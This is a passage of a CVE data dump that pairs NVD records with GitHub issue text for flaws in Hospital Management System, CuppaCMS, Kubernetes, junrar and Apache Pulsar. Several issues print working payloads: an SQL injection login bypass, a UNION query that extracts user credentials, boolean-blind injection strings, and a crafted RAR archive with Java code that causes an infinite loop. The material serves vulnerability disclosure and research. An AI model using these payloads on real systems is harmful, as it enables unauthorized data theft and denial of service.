"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kishan0725/Hospital-Management-System/issues/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DA36E354-4DBF-4BE4-9BC4-CB00C6771BAF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/kishan0725/Hospital-Management-System/issues/17 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kishan0725",
"Hospital-Management-System"
] | ## VULNERABLE: SQL Injection Authentication Bypass exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/func.php" via the ‘email’ parameters.
+ Description: The vulnerability is present in the “/Hospital-Management-System-master/func.php " , and can be exploited throuth a POST request via the ‘email’ parameters.
+ Impact: Allow attacker inject query and access , disclosure of all data on the system.
+ Suggestions: User input should be filter, Escaping and Parameterized Queries.
+ Payload: email =' or 1 limit 0,1#
+ File affect:
+ 
+ Proof of concept (POC):
+ Inject payload:
+ 
+ Bypass authentication success and redirect admin panel
+ 
| Bypass authentication with SQL Injection | https://api.github.com/repos/kishan0725/Hospital-Management-System/issues/17/comments | 1 | 2022-01-25T17:07:00Z | 2023-05-08T15:48:58Z | https://github.com/kishan0725/Hospital-Management-System/issues/17 | 1,114,148,255 | 17 | 3,162 |
CVE-2022-24264 | 2022-01-31T22:15:07.777 | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/13"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CuppaCMS/CuppaCMS/issues/13 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | + VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
“/administrator/components/table_manager/" via the ‘search_word’ parameters.
+ Date: 3/1/2022
+ Exploit Author: Trương Hữu Phúc
+ Contact me:
+ Github: https://github.com/truonghuuphuc
+ Email: phuctruong2k@gmail.com
+ Product: CuppaCMS
+ Description: The vulnerability is present in the “/administrator/components/table_manager/" , and can
be exploited throuth a POST request via the ‘search_word’ parameters.
+ Impact: Allow attacker inject query and access , disclosure of all data on the system.
+ Suggestions: User input should be filter, Escaping and Parameterized Queries.
+ Payload:
```search_word=') union all select concat('version:',version(),'<br>'),concat('database:',database(),'<br>'),group_concat('username:',username,'<br>','password:',password),4,5,6,7,8 from cu_users-- -```
+ Proof of concept (POC):

+ You can see injection code query into search_word parameters as show below
+ Request:

+ You see version , database and data as show below
+ Response:

+ Request and Response:

+ Report:
[Report.pdf](https://github.com/CuppaCMS/CuppaCMS/files/7801572/Report.pdf) | VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters. | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/13/comments | 1 | 2022-01-03T11:13:24Z | 2022-02-03T17:49:23Z | https://github.com/CuppaCMS/CuppaCMS/issues/13 | 1,092,421,818 | 13 | 3,163 |
CVE-2022-24265 | 2022-01-31T22:15:07.827 | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/14"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CuppaCMS/CuppaCMS/issues/14 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | + VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
“/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters.
+ Date: 4/1/2022
+ Exploit Author: Trương Hữu Phúc
+ Contact me:
+ Github: https://github.com/truonghuuphuc
+ Email: phuctruong2k@gmail.com
+ Product: CuppaCMS
+ Description: The vulnerability is present in the “/administrator/components/menu/" , and can be
exploited throuth a POST request via the ‘path=component/menu/&menu_filter=3’ parameters.
+ Impact: Allow attacker inject query and access , disclosure of all data on the system.
+ Suggestions: User input should be filter, Escaping and Parameterized Queries.
+ Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
+ Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
+ Payload exploit example: path=component/menu/&menu_filter=3' and
if(SUBSTRING(database(),index,1)='character','1','0')='1
+ Payload exploit: path=component/menu/&menu_filter=3' and
if(SUBSTRING(database(),1,1)='c','1','0')='1
+ Proof of concept (POC):
+ Payload Boolean true: path=component/menu/&menu_filter=3' and '3'='3
+ Request and Response:

+ Payload Boolean false: path=component/menu/&menu_filter=3' and '4'='3
+ Request and Response:

+ Exploit:


+ Report:
[Report.pdf](https://github.com/CuppaCMS/CuppaCMS/files/7806834/Report.pdf)
| SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/ | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/14/comments | 0 | 2022-01-04T10:07:38Z | 2022-01-29T01:26:08Z | https://github.com/CuppaCMS/CuppaCMS/issues/14 | 1,093,195,882 | 14 | 3,164 |
CVE-2022-24266 | 2022-01-31T22:15:07.880 | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/17"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/truonghuuphuc/CVE"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CuppaCMS/CuppaCMS/issues/17 | [
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | + VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
“/administrator/components/table_manager/" via the ‘order_by’ parameters.
+ Date: 6/1/2022
+ Exploit Author: Trương Hữu Phúc
+ Contact me:
+ Github: https://github.com/truonghuuphuc
+ Facebook: https://www.facebook.com/DdosFulzac.auz1/
+ Email: phuctruong2k@gmail.com
+ Product: CuppaCMS
+ Description: The vulnerability is present in the “/administrator/components/table_manager/" , and can
be exploited throuth a POST request via the ‘order_by’ parameters.
+ Impact: Allow attacker inject query and access , disclosure of all data on the system.
+ Suggestions: User input should be filter, Escaping and Parameterized Queries.
+ Proof of concept (POC):
+ File report: https://drive.google.com/file/d/1TJChIvaQXPKdcnWxpjamJ_xfJIc--Jj1/view
+ Video Poc: https://drive.google.com/file/d/1xvTwbx74CGKMPN4BzCpNyUy_XqTqzpI2/view | Time-based SQL Injection | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/17/comments | 0 | 2022-01-06T15:19:45Z | 2022-01-29T01:26:45Z | https://github.com/CuppaCMS/CuppaCMS/issues/17 | 1,095,419,505 | 17 | 3,165 |
CVE-2020-8562 | 2022-02-01T11:15:10.903 | As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or localhost (127.0.0.0/8) range. Kubernetes then performs a second DNS resolution without validation for the actual connection. If a non-standard DNS server returns different non-cached responses, a user may be able to bypass the proxy IP restriction and access private networks on the control plane. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.2,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.7,
"impactScore": 1.4,
"source": "jordan@liggitt.net",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/101493"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20220225-0002/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/101493"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20220225-0002/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BE1AD99-F12A-4F6E-8EA5-578F32A1F15F",
"versionEndExcluding": null,
"versionEndIncluding": "1.18.18",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "34CCC198-AAA6-4DAE-94C4-B8CE55F621F7",
"versionEndExcluding": null,
"versionEndIncluding": "1.19.10",
"versionStartExcluding": null,
"versionStartIncluding": "1.19.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6868B56F-DDBE-4CDA-9537-A0CAD3CDB1AB",
"versionEndExcluding": null,
"versionEndIncluding": "1.20.6",
"versionStartExcluding": null,
"versionStartIncluding": "1.20.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:1.21.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1A3D8AFD-1FB4-4F98-8522-E57A15DD00BB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"367"
] | 367 | https://github.com/kubernetes/kubernetes/issues/101493 | [
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating: **Low** ([CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N))
A security issue was discovered in Kubernetes where an authorized user may be able to access private networks on the Kubernetes control plane components. Kubernetes clusters are only affected if an untrusted user can create or modify Node objects and proxy to them, or an untrusted user can create or modify StorageClass objects and access KubeControllerManager logs.
This issue has been rated Low (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N) and assigned CVE-2020-8562.
As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or localhost (127.0.0.0/8) range. Kubernetes then performs a second DNS resolution without validation for the actual connection. If a non-standard DNS server returns different non-cached responses, a user may be able to bypass the proxy IP restriction and access private networks on the control plane.
### Affected Versions:
All versions of Kubernetes are affected
### Fixed Versions
There is no fix for this issue at this time.
### Mitigations
If this issue affects your clusters’ control planes, you can use dnsmasq for name resolution and configure the min-cache-ttl and neg-ttl parameters to a low non-zero value to enforce cached replies for proxied connections.
### Detection
This issue is not known to be directly detectable, but proxied calls will appear in the Kubernetes API Audit log. Kubernetes will respond with “address not allowed” when the validation successfully prevents a connection.
### Acknowledgements
This vulnerability was reported by Javier Provecho (Telefonica).
/area security
/kind bug
/committee product-security
/triage accepted | CVE-2020-8562: Bypass of Kubernetes API Server proxy TOCTOU | https://api.github.com/repos/kubernetes/kubernetes/issues/101493/comments | 16 | 2021-04-26T19:18:04Z | 2024-08-07T19:47:47Z | https://github.com/kubernetes/kubernetes/issues/101493 | 868,051,410 | 101,493 | 3,166 |
CVE-2022-23596 | 2022-02-01T12:15:08.257 | Junrar is an open source java RAR archive library. In affected versions A carefully crafted RAR archive can trigger an infinite loop while extracting said archive. The impact depends solely on how the application uses the library, and whether files can be provided by malignant users. The problem is patched in 7.4.1. There are no known workarounds and users are advised to upgrade as soon as possible. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/junrar/junrar/commit/7b16b3d90b91445fd6af0adfed22c07413d4fab7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/junrar/junrar/issues/73"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/junrar/junrar/security/advisories/GHSA-m6cj-93v6-cvr5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/junrar/junrar/commit/7b16b3d90b91445fd6af0adfed22c07413d4fab7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/junrar/junrar/issues/73"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/junrar/junrar/security/advisories/GHSA-m6cj-93v6-cvr5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:junrar_project:junrar:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB985B41-1018-4112-90D3-01036942F48B",
"versionEndExcluding": "7.4.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"835"
] | 835 | https://github.com/junrar/junrar/issues/73 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"junrar",
"junrar"
] | **Describe the bug**
A carefully crafted RAR archive can trigger an infinite loop while parsing the file. This could be used to mount a denial of service attack against services that use junrar.
**To Reproduce**
```
String encodedString = "UmFyIRoHAM+Qcw4AAAAAKgAAAAAXF3QggE4ASwEAACICAAADZXUl9710qkIdNC4ApIEAAF9fTUlDT1NYXC5fYXBwbGUpdG91Y2gtaWNvbi03MC1wcmVjb21wb3NlZC5wbmcJ3RFMy9WBV2REVHpele6iC2cnv5JltbeqElgNF1pFjxFEQOWXhHq2ScsnIV5jb21wb3NlZC6Qcw4AAAAAKgAAAGREVA+VZ3qi7l4nv5Jly7W3qhJYDZDaRcURs78ajbZ7SWjLJyFah8afvQIAAADEvXYBRXwAQAUBBgAAAAAAAC/jZmlgun4oIP1Z4AG7ybwKgFwrlLrUKiSxjkiGPQFX/wAAL/8A////////+SVUCUzV3REly4FXZEReVHqV7qJYZyezxAAAAAAAAL+SZbVft6ruqo0QWkWPEUSMA5dA5QCE+3q2AAAAAAAAAgBJyyMhXocAAAAAAIefGkfCXwV8FHoKlbPhXgA//O5fgDAhAQAAAAAAAABuZphoBm71hnkO4GbmYGm6fs7f/VkAAAACAAFXqLsj6Xd3d3d3d3d3d3dgd3d3d3d3d3d3d3d3V3d3d3d3d3d3d3d3d3d3d3d3d3dzd3V3d3fTd3d3OJIAAABSAHIhGgcAz5BzAAANAAAAAAAAABcXdHkASwEAACICAAAD////////////////////+////////z1ldSV3dw==";
byte[] decodedBytes = Base64.getDecoder().decode(encodedString);
InputStream inputStream = new ByteArrayInputStream(decodedBytes);
final Archive archive = new Archive(inputStream);
while (true) {
FileHeader fileHeader = archive.nextFileHeader();
if (fileHeader == null) {
break;
}
archive.extractFile(fileHeader, OutputStream.nullOutputStream());
}
```
**Expected behavior**
Infinite loop.
**File**
[loop-913d3158487310b1b4b74086ab888f5ed56a8493.zip](https://github.com/junrar/junrar/files/7947329/loop-913d3158487310b1b4b74086ab888f5ed56a8493.zip)
**Environment (please complete the following information):**
- OS: Mac OS 12.1 & Ubuntu Linux 16.04 (4.15.0-163-generic)
- Junrar version: 7.4.0
**Additional context**
It seems this PoC can reach [this while loop] (https://github.com/junrar/junrar/blob/dc3d299b1596e8750f386021d6b4efde6c84bceb/src/main/java/com/github/junrar/unpack/vm/RarVM.java#L227-L629)
but never break. | [BUG]A carefully crafted RAR archive can trigger an infinite loop while parsing. | https://api.github.com/repos/junrar/junrar/issues/73/comments | 10 | 2022-01-27T03:29:04Z | 2022-03-25T01:33:31Z | https://github.com/junrar/junrar/issues/73 | 1,115,731,408 | 73 | 3,167 |
CVE-2021-41571 | 2022-02-01T13:15:09.663 | In Apache Pulsar it is possible to access data from BookKeeper that does not belong to the topics accessible by the authenticated user. The Admin API get-message-by-id requires the user to input a topic and a ledger id. The ledger id is a pointer to the data, and it is supposed to be a valid it for the topic. Authorisation controls are performed against the topic name and there is not proper validation the that ledger id is valid in the context of such ledger. So it may happen that the user is able to read from a ledger that contains data owned by another tenant. This issue affects Apache Pulsar Apache Pulsar version 2.8.0 and prior versions; Apache Pulsar version 2.7.3 and prior versions; Apache Pulsar version 2.6.4 and prior versions. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@apache.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/apache/pulsar/issues/11814"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/8n3k7pvyh4cf9q2jfzb6pb32ync6xlvr"
},
